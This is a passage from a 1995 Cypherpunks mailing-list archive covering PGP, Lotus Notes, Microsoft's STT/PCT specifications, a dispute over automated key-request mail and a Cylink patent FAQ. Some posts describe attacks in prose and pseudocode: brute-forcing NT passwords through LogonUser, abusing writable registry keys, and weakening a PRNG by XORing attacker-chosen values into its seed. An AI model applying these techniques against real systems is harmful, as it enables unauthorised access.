headers, which will either be: A) Ignored by a cookie-ignorant browser, or, B) Processed by a cookie-aware browser. In either case, the cookie cache reading/writing is done by the browser. If the browser is running as 'you' then it can access files that 'you' own. If you write protect it against yourself, then its likely that your user-agent (Netscape) running as 'you' can't write to that file. Cheers! w. archibald = From ploshin at tiac.net Wed Sep 27 08:54:38 1995 From: ploshin at tiac.net (Pete Loshin) Date: Wed, 27 Sep 95 08:54:38 PDT Subject: "Notes" to be Eclipsed by "Netscape" Message-ID: <01BA8CD0.30988CA0@ploshin.tiac.net> Timothy C. May[SMTP:tcmay at got.net] wrote: >At 6:52 PM 9/25/95, Jon Lasser wrote: > >>Perhaps the Notes pricing scheme is sooo outrageous (by the standards of >>a student like myself, and probably most others, if it's still anything >>like it was at the 1.0 release) that mostpeople have had zero opportunity >>to examine the program, let alone really have time to play with it? > >I've never even _seen_ a copy of Notes running on any machine, nor do I >know directly of _any_ of my colleagues who has. (Not saying nobody has, of >course, just that I can't find anyone I know well who has.) I've used Notes myself (and have written about how it and Notes add-in apps are used). Yes, it was overpriced, but they came out with a less-featured, less-expensive version (which I haven't seen). Based on my experiences, it appears to be a choice for rigid/business management/TQM types in big corporations, among others. >I've been following the news on Notes for at least several years, even to >the point of buying some Lotus stock several years ago on the strength of >what I had read about Notes. (Alas, I sold it soon thereafter, before a >run-up in price.) > >My point? Notes is nearly invisible in the non-corporate community I now >hang out in. No question about that. You need a dedicated server, server software and, at least a year ago, it all cost something like $500+ per seat to setup. Plus, it doesn't do you any good unless you are working in a workgroup. >Who knows what weaknesses or bugs it has in it. Folks on our list probably >don't have much familiarity with it. I only just subscribed to this list, and by all rights should probably spend more time lurking; that said, Notes includes encryption and digital signature. >My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM >overpaid for Lotus, that the notion of Notes becoming the universal >collaboration/communication option is flawed. There has been growing sentiment among certain sectors that workgroup computing is the wave of the future. Unfortunately, given IBM's track record, their purchase of Lotus seems to doom it to a fate similar to OS/2: an excellent product with a track record, with a small but fervent following, which will soon be eclipsed by some less-featured, newer product that makes someone a pot of money (like CollabraShare). Notes end users have always seemed to feel it had too much power and was not easy to figure out how to use; Notes programmers love it, and there are lots of addins. With Notes going to IBM, Netscape seems to have made another very clever move--while it still doesn't justify the overall stock price, it does justify the rise associated with that move. >(I've been saying for a while that the Web serves that purpose better, and >that Web browsers will likely edge out Notes. Apparently I was hardly >prescient, as Netscape recently bought Collabra, which is pushing that >point exactly.) Notes uses replication to distribute data across networks; there are better ways to have people compute remotely in my opinion too (not sure WWW is THE answer, but it certainly is one of them). >--Tim May -Pete Loshin peter at world.std.com From rrothenb at ic.sunysb.edu Wed Sep 27 08:55:24 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Wed, 27 Sep 95 08:55:24 PDT Subject: PGP and FBI? In-Reply-To: Message-ID: <199509271555.LAA14563@libws4.ic.sunysb.edu> > On Wed, 27 Sep 1995, Deranged Mutant wrote: > > > There's some sort of documentary on WBAI 99.5 FM out of NYC now. > > They're talking about PGP and right wing militias... the guy being > > interviewed called PGP a "one time pad system" and doesn't understand > > it... *sigh* > > Any more details on this? I know people who do shows on BAI. What > was the date/time of the show? If this is true, it's pretty sad, > especially since BAI's well known for being a "political" station. I forget the name of the show, it was on Tues. night (last night) after Pacifica (around midnight)... I wrote and sent the message while I was hearing it. I stopped after bleating out the message and listened to some of the show, which was about right wing militias, Weaver case, Okla bomb, etc... turns out I missed the short part where the person being interviewed (duh, should've written his name down) mentioned PGP, which he also said stood for "Pretty Good Program". Wish I had more details of the show... (BTW, I'm temporarily off the c'punks list) Rob > > --Dave. > > -- > Dave Mandl > dmandl at panix.com > http://wfmu.org/~davem > From jamesd at echeque.com Wed Sep 27 09:04:10 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 27 Sep 95 09:04:10 PDT Subject: Hack Microsoft? Message-ID: <199509271603.JAA23248@blob.best.net> At 10:33 AM 9/26/95 EDT, Dan Bailey wrote: >>For fun ways to hack NT, check out http://www.somar.com/security.html. >> Some of these are really laughable. You can use NT's LogonUser API >>call to repeatedly guess passwords until you hit it, since NT offers >>no way to limit number of login attempts. At 12:10 PM 9/26/95 -0400, RJ Harvey wrote: > I don't believe that's correct; under User Manager, select >the Account option under the Policies menu item; it lets you >select whether to lock-out the account after a given number >of invalid logon attempts, and to set the number. The main >problem here is that by default, I don't believe the 'lock out' >option is enabled Similarly there is an awful lot of other stuff that is left wide open by default, most notably important parts of the registry, in particular \HKEY_LOCAL_MACHINE\SOFTWARE Permissions on this are usually set to give every use write access, so that every user can install software. None of the installation programs reset their registry key to exclude write access by anyone other than the administrator or the person installing the program, as a result any user can muck with the environment of any program installed by any other user. As a result any user can force feed most programs strings which the program would ordinarily assume are internally generated, and can therefore be trusted. A low privilege user can muck with the internals of a program installed by a high privilege user. This of course is a bug in the installation programs, rather than a bug in the operating system, but it is an almost universal bug. (But before you Unix folk gloat, consider how few Unix programs *have* installation programs, also that Unix has no registry security problem because it has no registry.) --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From rsnyder at janet.advsys.com Wed Sep 27 09:16:36 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Wed, 27 Sep 95 09:16:36 PDT Subject: getting netscape to support the remailers In-Reply-To: <9509261951.AA01873@ch1d157nwk> Message-ID: <199509271614.MAA07080@mobster.cit.ge.com> andrew_loewenstern at il.us.swissbank.com said: > Netscape doesn't need to support remailers explicitly since Netscape > will be supporting Java. I think a remailer client is within > Java's capabilities... Anyone disagree? Depends on how Netscape impliments Java. Under HotJava it could concievably be done, although Security setting may restrict the browser from doing SMTP... Actually, I would suspect it might be possible to do using forms, using a mailto: form. Hmmmmmmmm....... Bob From tjic at OpenMarket.com Wed Sep 27 09:29:01 1995 From: tjic at OpenMarket.com (Travis Corcoran) Date: Wed, 27 Sep 95 09:29:01 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters Message-ID: <199509271628.MAA12868@cranmore.openmarket.com> -----BEGIN PGP SIGNED MESSAGE----- Message-Signature-Date: Wed Sep 27 12:28:47 1995 > Date: Tue, 19 Sep 1995 10:57:32 -0700 > To: cypherpunks at toad.com > From: tcmay at got.net (Timothy C. May) > Subject: Mini-mailbombs and Warning Letters > > I've received a couple of "automatically generated" pieces of > e-amil which tell me that, in the generator's opinion, something is > wrong with my public key, or it could not be found at the keyserver > > As the saying goes, "Sigh." > > Being on a list with 700 subscribers, some of whom are running > increasingly sophisticated automatic checking agents, I foresee an > increase in these "warning letters" from their checking agents who > feel posts are not adequate in some way. As the author of the package in question, I would like to point out: (1) the email msg Tim refers to (hereafter refered to by me as "query-mail") was a request for information, not a warning (2) the query-mail did not refer to any inadequacy in the original posting. It explicitly refers to the fact that the original poster PGP signed a message, but did not make the public key to verify the message easilly available. (3) the query-mail was sent to an actual person only after several non-intrusive methods had failed. (4) checking right now, I find that the finger command does indeed fail to get a public key from Tim's address. (5) checking right now, I find that BAL's keyserver does indeed fail to give any key with the address "tcmay at got.net" (6) the query-mail is not a purely robotic spam: there is a human in the loop (7) the keyserver used by query-mail generator defaults, not to some arbitrary preference, but to BAL's keyserver, which is the most used server that I know of, and which (to the best of my knowledge) receives regular updates from several other keyservers. (8) given that "increasingly sophisticated automatic checking agents" can make it much easier for individuals to gather keys, check incoming messages, and sign or encrypt outgoing messages, it seems that such "agents" tend to increase the usage and acceptance of cryptography, which is a good thing for all concerned. A question: in a situation like this one, where an individual signed a message with a key then did not make a key with the return address of his message available either through his .plan, or a keysever (the two de facto standards), what next step -if any- do people think is more appropriate than sending mail to the individual asking them for a copy of the key ? > I'm dealing with it the same way I'm dealing with the few people > who have something in their MIME setup that triggers my mailer > (Eudora Pro 2.1) to treat their text as attachments. Namely, by > filtering them out. This is a fine anarchistic solution to the problem (and that's a compliment!), from your point of view (although, I hasten to point out, not quite as good as submitting a key with a valid address on it to a keyserver). If anyone else wishes to ignore requests for keys, the subject string to add to your email kill-file is "please send me your PGP public key" Because I do think that automating parts of the the encryption/signing/verification/decryption/key-retrieval process will make cryptography more wide-spread (in so far as there is not a backlash against this automation), I do not want to ignore the concerns of others. So...how would people do things differently if they were writing this sort of software? One idea proposed by Jiri Baum is to find the key ID used to sign the message, and then query the keyserver with this ID, as opposed to an email string. I'm not sure whether or not I like this idea (for security reasons), but that question is moot, as it seems to be impossible given the current keyservers. Any other suggestions or ideas? - -- TJIC (Travis J.I. Corcoran) http://www.openmarket.com/personal/tjic/ Member EFF, GOAL, NRA. opinions (TJIC) != opinions (employer (TJIC)) "Buy a rifle, encrypt your data, and wait for the Revolution!" PGP encrypted mail preferred. Ask me about mail-secure.el for emacs. -----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: auto-signed by mail-secure.el v 0.998 using mailcrypt.el Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAwUBMGl7wIJYfGX+MQb5AQErpQP/XvoJ0QF4TEtPhJuxk5ifsUlXrl4RSvyP dFh1MkTQWl4/D+jFHI0MW+gyi2/EmzxEW+8zYUCLENBIq8H3QJgQDnQ9NRM3JiGU c9yd4EeE9bH8r+KppF5WfJfuE4hJ6YFRO0sdal0oJs3RfuF2ZIHoLoKPR5G97EGv dmWg2J784ZM= =xnv7 -----END PGP SIGNATURE----- From frissell at panix.com Wed Sep 27 09:46:25 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 27 Sep 95 09:46:25 PDT Subject: It's Wednesday Message-ID: <199509271646.MAA06516@panix.com> Do you know where your new Netscape is? From samman-ben at CS.YALE.EDU Wed Sep 27 10:15:37 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Wed, 27 Sep 95 10:15:37 PDT Subject: PGP and FBI? In-Reply-To: <199509270409.AAA00688@libws4.ic.sunysb.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 27 Sep 1995, Deranged Mutant wrote: > > There's some sort of documentary on WBAI 99.5 FM out of NYC now. > They're talking about PGP and right wing militias... the guy being > interviewed called PGP a "one time pad system" and doesn't understand > it... *sigh* Well there really is no reason that you cant use PGP as a hash function or its random function to produce OTP's. Ben. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMGmGpL5ALmeTVXAJAQGJ0AL/dCS9dbl5NBHohG6VrUgU2CdBP99AsYvD 7TN0hV8pJrsgsy1OyuCHAlP5rFBlUHiTsWUJfYKAhaRSgF4MLMfEpgKbc58BNkhh vXq3qfeIt/cRgiMbpuWpbtO9GyPzRSgR =vB06 -----END PGP SIGNATURE----- From donlonm at ccmail.mcclellan.af.mil Wed Sep 27 10:23:54 1995 From: donlonm at ccmail.mcclellan.af.mil (donlonm at ccmail.mcclellan.af.mil) Date: Wed, 27 Sep 95 10:23:54 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil> Ray, You wrote: >I've found a Netscape bug which I suspect is a buffer overflow and >may have the potential for serious damage. If it is an overflow bug, >then it may be possible to infect every computer which accesses a web >page with Netscape. Is there any way to avoid/prevent this problem by changing options in NetScape? Thanks, Mike D. From habs at warwick.com Wed Sep 27 10:23:57 1995 From: habs at warwick.com (Harry S. Hawk) Date: Wed, 27 Sep 95 10:23:57 PDT Subject: Microsoft & new Internet Security specs Message-ID: <199509271723.NAA16512@cmyk.warwick.com> http://www.prnewswire.com/cnoc/story/569463/18018 > [Company News on Call] [Return to Company Listing] > [Return to Headlines] > > MICROSOFT PUBLISHES SPECIFICATIONS DESIGNED TO HELP > IMPROVE SECURITY ON THE INTERNET > > ATLANTA, Sept. 27 /PRNewswire/ -- Microsoft Corp. (Nasdaq: MSFT) > today announced the publication of two specifications that address key > Internet security issues. Software designed with these specifications > will enable developers to incorporate improved security technology into > their applications, giving businesses and consumers confidence that > their transactions and communications will be secure. > The two specifications -- Secure Transaction Technology (STT) and > Private Communication Technology (PCT) -- were published today on the > Internet. To help encourage widespread adoption of STT and PCT, > Microsoft is making the specifications available at no charge to all > software developers, businesses, card brands and financial institutions > that want to create STT-compliant and PCT-compliant applications. Both > can be found on the Microsoft home page (http//:www.microsoft.com). > "We set out a year ago to build STT, a security system that meets > the strict requirements of the payment-card industry. STT's design uses > sophisticated cryptographic techniques to help protect and authenticate > consumers, merchants and financial institutions that use bank cards to > conduct business on the Internet," said Craig Mundie, senior vice > president of the consumer systems division at Microsoft. "After doing > so, we felt we could also apply our expertise to the Internet's need for > general-purpose security. PCT builds upon Secure Sockets Layer by > incorporating strong authentication and other technologies we developed > for STT." > STT, jointly developed with Visa International, is supported by the > Internet Shopping Network, RSA Data Security Inc. and Spyglass Inc. The > PCT specification is supported by Cylink Corp., FTP Software Inc., > Internet Shopping Network, NetManage Inc., OpenMarket Inc., Spyglass > Inc. and Starwave Corp. > "We cannot afford to have doubt cast over the ability to conduct > business on the Internet," said Marc Miller, executive vice president of > marketing and business development for Spyglass Inc. "We applaud > Microsoft for approaching the security issue as it should be approached > -- in an open forum within the Internet community. Our whole business > model is based on partnerships. We're happy to be working with > Microsoft to provide an open, specifications-based solution to help > ensure the viability of this exciting new medium." > The Secure Transaction Technology specification, jointly developed > by Microsoft and Visa, is designed to provide a secure method for > handling credit-card transactions across private and public networks. > By providing a technology that can be completely integrated with the > current bank-card system, STT will serve as a reliable payment system > for software providers to incorporate into their products. STT also > preserves the branded transaction relationships that merchants and > financial institutions have with their customers. > The Private Communication Technology specification is designed to > secure general-purpose business and personal communications on the > Internet. PCT includes features such as privacy, authentication and > mutual identification. As a secure communications technology, PCT > builds on the earlier advances embodied in Secure Sockets Layer (SSL). > PCT enhances SSL by separating authentication from encryption. This > means that PCT allows applications to use authentication that is > significantly stronger than the 40-bit key limit for encryption allowed > by the U.S. government for export. > "The Internet Shopping Network is committed to providing the most > secure online shopping environment possible," said Boris Putanec, vice > president of engineering for the Internet Shopping Network. "STT > delivers one of the highest levels of security and authentication for > shopping transactions, boosting electronic commerce." > Microsoft plans to incorporate both STT and PCT into its own > products, such as the Microsoft(R) Internet Explorer 2.0, which ships > with the Window(R) operating system, and is encouraging other software > developers to do the same. > The specifications released by Microsoft include use of encryption > capabilities based on technology from RSA Data Security Inc. > Founded in 1975, Microsoft is the worldwide leader in software for > personal computers. The company offers a wide range of products and > services for business and personal use, each designed with the mission > of making it easier and more enjoyable for people to take advantage of > the full power of personal computing every day. > Microsoft is either a registered trademark or trademark in the > United States and/or other countries. From tcmay at got.net Wed Sep 27 10:27:39 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 27 Sep 95 10:27:39 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters Message-ID: At 4:28 PM 9/27/95, Travis Corcoran wrote: >As the author of the package in question, I would like to point out: > >(1) the email msg Tim refers to (hereafter refered to by me as "query-mail") > was a request for information, not a warning I've received several of these, not just the one Travis sent. I don't sign my messages, never have, so I see no way this "agent" Travis ran could find such a signed message from me.m (It's conceivable he found an old--really old--message with a faked-up sig, as perhaps for a demonstration or spoof I was doing, but I'm skeptical. In any case, I suspect only an "automated searcher" could find the one or two messages that may look like this. If Travis produces the message here, I'm sure this will be what the situation is.) >(4) checking right now, I find that the finger command does indeed > fail to get a public key from Tim's address. > >(5) checking right now, I find that BAL's keyserver does indeed fail > to give any key with the address "tcmay at got.net" Like I said, I don't sign messages. My PGP 2.0 key was signed at the second CP meeting and, they tell me, submitted on the original MIT ring. "tcmay at netcom.com" was my e-mail address at that time. >A question: in a situation like this one, where an individual signed a >message with a key then did not make a key with the return address of >his message available either through his .plan, or a keysever (the two >de facto standards), what next step -if any- do people think is more >appropriate than sending mail to the individual asking them for a copy >of the key ? Ignore it. Why hassle people who have no plan or finger configurations? (I don't have a shell account.) Besides, people who really want to communicate with me with PGP simply ask for it. If you don't like this, fine. But don't robo-interrogate and send robo-warnings. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From daw at CS.Berkeley.EDU Wed Sep 27 10:48:23 1995 From: daw at CS.Berkeley.EDU (David_A Wagner) Date: Wed, 27 Sep 95 10:48:23 PDT Subject: Exchange random numbers (was: Re: netscape's response) In-Reply-To: <199509270913.KAA17943@piraya.electrum.kth.se> Message-ID: <199509271747.KAA01043@lagos.CS.Berkeley.EDU> > | > Giving out contribution: > | > MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote > | > Taking in contribution : > | > my_seed = my_seed XOR > | > ((select_low_bits(remote_contrib, contrib_width) << contrib_area) So here's another attack on this scheme which I noticed today. I'll assume you're using the Netscape/RSAREF PRNG: prng() { increment(my_seed); return(MD5(my_seed)); } Then an attacker can send you ``1'' as contribution. This will xor ``1 << contrib_area'' into your seed. With probability 1/2, this will be the same as subtracting ``1 << contrib_area'' from your seed -- and in this case, your PRNG will repeat after ``1 << contrib_area'' more outputs. This is much worse than the expected 1 << 128 cycle length. So this is an example of why it's dangerous to xor in values *chosen by your adversary* to your seed. > Could you quantify how powerful a related-key attack is, compared to > some other kind of attack? I don't know anything about this kind of > attack, do you have any references? I don't know about any work on related-key attacks on stream ciphers. For block ciphers, related-key attacks are much stronger than other attacks. (e.g. DES can be broken with ~ 2^28 related key queries and about ~ 2^28 off-line computation steps) Here's some references on related key attacks on block ciphers. If anyone can find any other work in this area, let me know! @inproceedings{subkeys-important, author = {Edna K. Grossman and Bryant Tuckerman}, title = {Analysis of a Weakened {Feistel}-like Cipher}, booktitle = {1978 International Conference on Communications}, pages = {46.3.1--46.3.5}, publisher = {Alger Press Limited}, year = {1978}, annote = {Feistel ciphers with identical subkeys in each round are very weak} } @article{related-keys-1, author = {Robert Winternitz and Martin Hellman}, title = {Chosen-key Attacks on a Block Cipher}, journal = {Cryptologia}, year = {1987}, volume = {{XI}}, number = {1}, month = {January}, pages = {16--20} } @inproceedings{related-keys-2, author = {Eli Biham}, title = {New Types of Cryptanalytic Attacks Using Related Keys}, booktitle = {Advances in Cryptology: {EUROCRYPT} '93}, pages = {398--409}, publisher = {Springer-Verlag}, year = {1994} } From tjic at OpenMarket.com Wed Sep 27 11:33:47 1995 From: tjic at OpenMarket.com (Travis Corcoran) Date: Wed, 27 Sep 95 11:33:47 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters In-Reply-To: Message-ID: <199509271833.OAA13270@cranmore.openmarket.com> -----BEGIN PGP SIGNED MESSAGE----- Message-Signature-Date: Wed Sep 27 14:33:28 1995 > Date: Wed, 27 Sep 1995 10:39:21 -0700 > From: tcmay at got.net (Timothy C. May) > > At 4:28 PM 9/27/95, Travis Corcoran wrote: > > >As the author of the package in question, I would like to point out: > > > >(1) the email msg Tim refers to (hereafter refered to by me as "query-mail") > > was a request for information, not a warning > > I don't sign my messages, never have, so I see no way this "agent" Travis > ran could find such a signed message from me. OK, then this sidetracks the discussion, as it seems we've got a bug in either software behavior (despite a fair amount of testing) or user behavior. If it's the former, I apologize for any hassle my software caused. I'll investigate this and issue a fix if it is a software problem. However, I remind you that the query-mail said in it - ------------------------------ snip! ------------------------------ If there is a bug w this sftwr (for example, you never PGP sign your msgs, so this entire msg makes no sense) [ ... ] please mail the author of this package ( tjic at openmarket.com ) - ------------------------------ snip! ------------------------------ For future reference, if anyone finds a bug in any of my software (free or otherwise), it is much more likely to get fixed by mailing me directly than by posting a manifesto about the class of software as a whole to a mailing list or newsgroup. > >A question: in a situation like this one, where an individual > >signed a message with a key then did not make a key with the > >return address of his message available [ ... ] what next step -if > >any- do people think is more appropriate than sending mail to the > >individual asking them for a copy of the key ? > > Ignore it. Why hassle people who have no plan or finger > configurations? Well, during the year or so I've been using my package I've tried to verify thousands of posts. In hundreds of these times, I've not had the key on hand and had to use finger or the keysevers. In dozens of these times, finger and the keyserver failed, I sent mail to the original poster, and got a response back along the lines of: "Unfortunately finger doesn't work at my site, but my key is on the keysever...oh, wait...the address on the key is 6 months out of date! Sorry! Just updated it. { Try now. | My updated key is below }." Thus, history has shown that it is often quite valid to ask people for their keys when all other avenues have been exhausted. Further, I imagine that the vast majority of people who sign public UseNet messages intend for their messages to be verifiable, and thus find it reasonable to be asked for their keys if their keys are not easilly available. If anyone thinks this is an incorrect assumption, I'd like to hear their thinking. > Besides, people who really want to communicate with me with PGP > simply ask for it. Uh...isn't that the purpose that the query mail ("Please mail me your key. Thank you.") was serving? I'm not sure whether you're objecting to someone asked for your key, or the fact that they did it through a semi-automated process. I posted an idea for a scheme recently that would convey the datum "I prefer PGP-encrypted mail" to intelligent cryptography-aware news/mail-readers. Perhaps the same scheme should be used to convey the datum "I do feel the need for my PGP-signed messages to be verified. Please do not ask me for my key." While it would be easy enough to implement, I'm not sure how many people would choose to encode this tag into their sig block or headers... > If you don't like this, fine. But don't robo-interrogate and send > robo-warnings. I think the phrase "robo-interogate" is pretty strong for sending a piece of email that has as its central message "Please mail me your key. Thank you." The phrase "robo-warnings" is even less appropriate and relevant. For the record, the full text of the query mail (including all three uses of the word "please", and all 0 references to "warnings", "interogations", and "truncheons" ) is: - ------------------------------ snip! ------------------------------ To: < mail-signer > Subject: please send me your PGP public key Hello. While reading either email or UseNet I came across a PGP signed msg from you, but did not have your public key to verify it with. My mail/newsreader fingered your account for your key and failed. It then tried to get your key from the keyserver at < keyserver-address > but the key was not there. Please mail me your key. Thank you. (If you think that the key should be there, be aware that my mailreader searched for the key by your email addr as seen by me - the same addr *this* piece of mail is being sent to. If you registered a key with the server, that key may not have on it your addr as it is seen by the rest of the world.) P.S. This mail was composed by my mailreading sftwr, which automatically scans incoming mail, looking for failed keyserver requests, and prompts me whether it should automatically send this msg on my behalf. If there is a bug w this sftwr (for example, you never PGP sign your msgs, so this entire msg makes no sense), or if you're interested in the software itself (mail-secure.el: a package in lisp for emacs; this is just one of the many crypto/privacy related things it does) please mail the author of this package ( tjic at openmarket.com) for details. - ------------------------------ snip! ------------------------------ If anyone has a constructive suggestion as to how this mail could be changed to convey more information or to be less "threatening", please mail me. - -- TJIC (Travis J.I. Corcoran) http://www.openmarket.com/personal/tjic/ Member EFF, GOAL, NRA. opinions (TJIC) != opinions (employer (TJIC)) "Buy a rifle, encrypt your data, and wait for the Revolution!" PGP encrypted mail preferred. Ask me about gnuslive.el for emacs. -----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: auto-signed by mail-secure.el v 0.998 using mailcrypt.el Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAwUBMGmY+YJYfGX+MQb5AQGIvQP+KWoHrZeFYqWdyTe8K4iUrXvL6xtjG9S4 QLIkk2n6Zmzw9lNc915B6teYgFf55EI6H1NIyrT8RQXS6TfinlphNc9kH0YJqWjE SIpEmfre6HuvHfYcWHLGb8hgX0Smwfvoq/nVqy3DT1H7s0Sbm4Ko532BOUKKzVxY r2VLj5XmzEg= =ptpV -----END PGP SIGNATURE----- From sbryan at maroon.tc.umn.edu Wed Sep 27 12:13:05 1995 From: sbryan at maroon.tc.umn.edu (Steve Bryan) Date: Wed, 27 Sep 95 12:13:05 PDT Subject: macworld crypto articles Message-ID: >> In article <4444rl$nrh at life.ai.mit.edu> Chen writes: >> > It's truly a deplorable state of affairs. >> >> For the next version, include PGP free with every version of Quicken, >> and have Quicken just "call" PGP. >> >> Of course, users can encrypt their files now with PGP. Is there an >> Intuit bboard where someone could post instructions? > >This is a good idea. I'll bring it up with the appropriate people. > >Right now, we only have some cheesy forums going on Compuserve and >Prodigy; however, keep your eyes peeled. We have other stuff in the >works. PGP is probably too unweildy for the non-hobbyist to comfortably use. I don't know if anyone else has suggested it but I'd strongly encourage Intuit to make CryptDisk for the Mac easily available. I use it to maintain an encrypted partition for my financial data and the user interface is quite simple. I believe the DOS equivalent is SecureDisk. +---------------------------------------------------------------------- |Steve Bryan Internet: sbryan at gofast.net |Sexton Software CompuServe: 76545,527 |Minneapolis, MN Fax: (612) 929-1799 |PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D E1 8C A6 9B A9 BE 96 CB +---------------------------------------------------------------------- From ic58 at jove.acs.unt.edu Wed Sep 27 12:13:07 1995 From: ic58 at jove.acs.unt.edu (Childers James) Date: Wed, 27 Sep 95 12:13:07 PDT Subject: (fwd) CYLINK Q&A on PKP Arbitration Decision Message-ID: <199509271910.OAA23774@jove.acs.unt.edu> Newsgroups: sci.crypt,talk.politics.crypto,alt.security.pgp Path: news.unt.edu!cs.utexas.edu!howland.reston.ans.net!ix.netcom.com!netcom.com!jkennedy From: jkennedy at netcom.com (John Kennedy) Subject: CYLINK Q&A on PKP Arbitration Decision Message-ID: Keywords: Cylink, PKP, RSA, Public Key Organization: CYLINK Date: Wed, 27 Sep 1995 08:19:58 GMT Lines: 277 Sender: jkennedy at netcom23.netcom.com Xref: news.unt.edu sci.crypt:39749 talk.politics.crypto:12787 alt.security.pgp:43387 ----------------------------------------------------------------- CYLINK Q&A on PKP ARBITRATION The following statement from Cylink Corporation has been posted to sci.crypt, talk.politics.crypto, and alt.security.pgp since we believe it will be of interest to a large and diverse set of readers. Please choose the appropriate newsgroup(s) to direct any follow- ups. A copy of this statement is also being placed on Cylink web page (http://www.cylink.com). Additional related materials and updates will also appear there. Feel free to distribute this statement to other appropriate newsgroups, mailing lists, and individuals. -John C. Kennedy, Cylink Corporation {ph: 408.735.5885 , jkennedy at cylink.com} ---------------------- Cylink Corporation ------------------------- September 26, 1995 IMPACT OF CYLINK VS. RSA ARBITRATION AWARD FREQUENTLY ASKED QUESTIONS Q. Why is the recent arbitration award between Cylink and RSA Data Security significant for RSA's licensees and vendors of public key cryptography in general? A. The arbitration award is important to RSA's licensees for two reasons: First, the award makes it very clear that RSA does not have the right to authorize its customers to copy RSA's software; it doesn't matter whether the RSA customer is merely copying object code versions of RSA's products. The right to copy RSA software requires a patent license. Second, until now RSA has claimed itself to be the de facto standard in public key cryptography. This claim was possible only so long as RSA could prevent its competitors from getting patent licenses from Public Key Partners. Now that the arbitrators have dissolved PKP, Cylink can enable vendors to practice low cost public key technology without the use of RSA. The market will finally enjoy vigorous competition based on technology and price. Q. In a recent statement, RSA's president still makes the claim that the use of RSA software does not require a separate patent license. Is that true? A. That statement is not true for any RSA licensee who needs the right to copy RSA software. The heart of RSA's business is licensing so-called tool kits; the vendor takes one copy, incorporates it into the vendor's own product and then makes all of its own copies. The only RSA customers who don't need a patent license are those who don't copy RSA software. Q. That could be pretty serious for RSA and its customers. Can you back up this statement? A. Absolutely. Read the arbitrators' award at p. 14. If you haven't received a copy from RSA you can find it on Cylink's home page (http://www.cylink.com). Don't take our word for it. When RSA's own attorneys pleaded with the arbitrators to change their decision, they admitted that "... every single RSA licensee will now be required to obtain a Stanford Patent License from Cylink or run the risk of being sued" (ask RSA for a copy its attorneys' letter dated September 7). In a second decision dated September 12, the arbitrators flatly rejected RSA's pleas and confirmed their restrictions on the rights of RSA's customers. (a copy is also available from Cylink's home page). Q. RSA's president promises to indemnify all of its customers. Why should they be concerned? A. If you compare RSA's size against the size and number of its customers copying RSA's software, one should ask whether RSA's pockets are deep enough to reimburse its customers for the damage RSA has caused. Q. Did RSA know it did not have all of the rights it promised its customers in RSA's software licenses? A. Shortly after RSA gave up its patent rights to PKP, Cylink began warning RSA that its did not have all of the rights it was promising some of its customers. Unfortunately, Cylink had to finally bring the arbitration to straighten this out. Q. Why do RSA's customers need a license to the Stanford patents simply to copy RSA's software? A. Two reasons. The Stanford Hellman-Merkle patent is the very first patent to describe Dr. Hellman's brilliant invention of public key cryptography. All subsequent refinements on this pioneer patent which implement Dr. Hellman's concept, such as the RSA algorithm, require a license to Dr. Hellman's patent. Secondly, the Diffie-Hellman key exchange technique is a standard feature in many of RSA's tool kits, which is also covered by Stanford's Diffie-Hellman patent. Finally, if RSA were correct in its statements that you don't need a Stanford license to use RSA's software, why would they embark on yet another expensive lawsuit to attack the patents? Q. Isn't the Hellman-Merkle patent limited to practicing something called the knapsack? A. No. As the pioneer patent in public key, the inventors were required to disclose only one implementation to support their ground breaking invention. Even if no one is using the knapsack itself, this particular patent continues to cover all practice of public key. Only improvements, such as the RSA algorithm described in MIT's patent, are limited to the specific enablement described in the patent. Again, don't just take our word for it. RSA itself admits that RSA software is covered by these patents. Just look at their license for RSAREF, Paragraph 6 (before they have time to change it). Q. But RSA has now brought suit to invalidate the Stanford Patents. Doesn't this protect RSA's customers? A. RSA's attempt to invalidate the very patents it had been licensing as a partner in PKP does nothing for RSA's customers. First of all, the fact that someone else is challenging the validity of a patent doesn't make an infringer immune from suit. RSA's challenge to the Stanford patent would not prevent Cylink from suing and obtaining damages and an injunction against any infringer. (Indemnity for damages, by the way, is cold comfort if an RSA customer is enjoined from selling any public key software.) Second, anyone who waits around for RSA's case to be resolved is taking a big gamble. Patents are presumed valid and RSA will have to prove invalidity under the "clear and convincing" burden of proof (which is higher than the traditional "preponderance of the evidence" standard and just below the criminal "reasonable doubt" standard). If RSA looses the suit, all of its customers will be left hanging. An RSA indemnity won't be worth much if RSA goes into bankruptcy. Q. RSA claims that Cylink "confirmed" to RSA licensees "in writing" "that no separate patent licenses were necessary if they licensed RSA software." Is this true? A. No. During the arbitration, however, one prospective RSA licensee approached Cylink and said that RSA kept assuring them that they didn't need a patent license to make their own copies of RSA public key software, but they had gotten suspicious when their own lawyers looked at the question closely. Cylink told the prospect that a patent license was needed for some of their projects, but in this instance Cylink would not interfere with the pending RSA deal. RSA customers who take the initiative and contact Cylink (as in this 